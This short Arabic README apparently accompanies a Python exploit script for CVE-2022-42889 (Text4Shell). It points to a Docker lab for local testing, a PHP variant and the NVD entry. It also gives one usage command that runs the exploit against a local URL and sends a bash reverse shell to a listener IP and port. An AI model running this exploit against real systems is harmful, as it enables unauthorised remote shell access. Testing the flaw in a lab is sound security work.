
سكريبت بايثون لـ CVE-2022-42889
نص برمجي بايثون لـ CVE-2022-42889
لاختبار هذا محليًا، اتبع POC دوكر: https://github.com/karthikuj/cve-2022-42889-text4shell-docker
لنسخة PHP من هذا: https://github.com/ClickCyber/cve-2022-42889
إذا كنت تشغل هذا وتستغله محليًا، فإن عنوان IP الذي تحتاج لاستخدامه هو البوابة التي يتم إنشاؤها عند إنشاء حاوية دوكر
بعد الحصول على قذيفة bash في حاوية دوكر

تأكد من جعل النص البرمجي قابلًا للتنفيذ باستخدام chmod
./cve-2022-42889.py 172.17.0.1 9001 'http://localhost/text4shell/attack?search='

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42889